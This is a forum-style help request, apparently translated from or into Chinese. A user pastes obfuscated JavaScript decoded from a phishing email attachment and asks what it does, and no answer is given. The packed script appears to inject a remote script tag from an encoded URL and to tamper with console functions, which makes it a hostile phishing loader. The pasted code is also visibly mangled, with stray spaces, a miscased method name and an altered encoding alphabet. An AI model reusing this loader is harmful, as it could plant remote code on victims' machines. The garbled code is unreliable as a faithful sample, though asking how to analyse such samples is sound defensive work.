问题描述
我收到了附件中包含 base64 加密 JS 代码的网络钓鱼电子邮件。我解密了它但无法理解它,因为它被混淆了。你们知道这段代码试图做什么吗?或者任何文章、链接谈论类似的问题?
<script>
eval(function($nbrut,$utnbr,$nbr,$ut,$uyn,$yun) {
$uyn = function($charCode) {
return ($charCode < $utnbr ? '' : $uyn(parseInt($charCode / $utnbr))) + (($charCode = $charCode % $utnbr) > 35 ? String.fromCharCode($charCode + 29) : $charCode.toString(36));
};
if (!''.replace(/^/,String)) {
while ($nbr--) {
$yun[$uyn($nbr)] = $ut[$nbr] || $uyn($nbr);
}
$ut = [function($encoded) {
return $yun[$encoded]
}];
$uyn = function() {
return '\\w+'
};
$nbr = 1;
};
while ($nbr--) {
if ($ut[$nbr]) {
$nbrut = $nbrut.replace(new RegExp('\\b' + $uyn($nbr) + '\\b','g'),$ut[$nbr]);
}
}
return $nbrut;
}('5 f=["1G=","I==","H","z=","Z==","X","T==","s","W","N","O","P","Q=","R==","S=","U","M=","V=","Y=","10","17=","12==","13==","14=="];!7(e,x){!7(x){c(;--x;)e.15(e.K())}(L)}(f);5 3=7(x,e){5 r=f[x=+x];j 0===3.k&&(3.i=7(x){c(5 e=7(x){c(5 e,r,d=l(x).J(/=+$/,""),n="",t=0,a=0;r=d.u(a++);~r&&(e=t%4?v*e+r:r,t++%4)&&(n+=l.w(y&e>>(-2*t&6))))r="B+/=".C(r);8 n}(x),r=[],d=0,n=e.A;d < n; d++) r += "%" + ("D" + e.E(d).h(16)).F(-2); 8 G(r)
},3. g = {},3. k = !0);
5 d = 3. g[x];
8 j 0 === d ? (r = 3. i(r),3. g[x] = r) : r = d,r
},9 = 7() {
5 d = !0;
8 7(e,r) {
5 x = d ? 7() {
11(r) {
5 x = r[3("19")](e,1 b);
8 r = 1 x,x
}
} : 7() {};
8 d = !1,x
}
}(),m = 9(18,7() {
c(5 x = 7() {
5 e;
1 z {
e = 1 A(3("1B") + (3("1C") + 3("1D")) + ");")()
}
1 E(x) {
e = 1 F
}
8 e
}(),e = x[3("o")] = x[3("o")] || {},r = [3("1J"),3("1H"),3("1K"),"1I","1w",3("1v"),"1k"],d = 0; d < r[3("1t")]; d++) {
5 n = 9[3("1u")][3("1c")] .1 d(9),t = r[d],a = e[t] || n;
n[3("1e")] = 9[3("q")](9),n[3("1f")] = a.h[3("q")](a),e[t] = n
}
});
m();
5 1 g = "",b = p[3("1h")](3("1i"));
b[3("1a")] = 3("1j"),b[3("1l")] = 3("1m") + "1n.1o/1p" + 3("1q"),p[3("1r")]("1s")[0][3("1y")](b);
',62,109,' || | _0x2e1d ||
var || function |
return |_0x237cb5 | _ | script34ssd |
for || | _0x10e7 | qQsyqN | toString | ZNmmFr | void | AbRSQZ | String | _0x51b37a || 0x0 | document | 0x6 || Dgv4Dc9QyxzHC2nYAxb0 || charat | 64 | fromCharCode || 255 | yxbWzw5Kq2HPBgq | length | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMnopQRSTUVWXYZ0123456789 | indexOf | 00 | charCodeAt | slice | decodeURIComponent | ChjVDg90ExbL | D2fYBG | replace | shift | 359 | DgfIBgu | Bg9N | E30Uy29UC3rYDwn0B3iOiNjLDhvY | BgvUz3rO | zJa3mZq1mZe5mZeUANm | CMv0DxjUicHMDw5JDgLVBIGPia | BIb0AgLZiIKOicK | dhlWzq | C3jJ | y29UC3rYDwn0B3i | x19WCM90B19F | Ahr0Chm6lY90AxrRBY53yw5Jzg5H | yxbWBhK | yMLUza | C2nYAxb0 |
if | Aw5MBW | y29UC29Szq | y3jLyxrLrwXLBwvUDa | push || z2v0rwXLBwvUDhncEvrHz05HBwu | this | 0x14 | 0x8 | arguments | 0x4 | bind | 0xa | 0x2 | emfromgetnbrtoo | 0x1 | 0x15 | 0x9 | trace | 0x11 | 0x7 | pp | page | 60 d36be72458a | 0xe | 0x16 | head | 0xd | 0x13 | 0x12 | exception | null | 0x5 |
try | Function | 0xf | 0xc | 0x10 |
catch | window | Dg9tDhjPBMC | 0x3 | error | 0xb | 0x17 '.split(' | '),{}))
</script>
任何帮助/建议将不胜感激。谢谢。
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)